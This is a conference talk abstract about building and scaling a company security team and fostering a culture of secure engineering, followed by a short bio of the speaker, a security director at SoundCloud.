While 'security is not a team', you'll find that most companies growing just beyond 60-80 people start employing a group of people focusing primarily on the topic. But the culture of secure engineering in a company does not only strongly correlate with when you start building a security team - it becomes (and grows as) a matter of how they connect with the rest of your organization, and make security, adversarial thinking, and the care for user safety and privacy part of everyone's concern. In this talk, we will review what the purposes of a security team can be, which challenges you'll face, how you can make it scale beyond the team's boundaries; as well as proven good practices of running (fairly operational) engineering teams themselves. Whether your organization already has a security team or is currently distributing security demands across areas, you'll be able to take away how to build (out) a dedicated security team and make your engineers (and, spoiler alert, other teams!) happy, healthy, and sustainable for the years to come.

Astera has always been fascinated with machines and how to make them do her own bidding, working in defensive security for the past decade. More recently, she's grown to love and prioritize the challenge of working with real humans in her life, and exciting others about this frontier. She works as the Director of Security at SoundCloud's Berlin headquarters, overseeing the Security, User Auth, Anti-Abuse, and Corporate IT teams.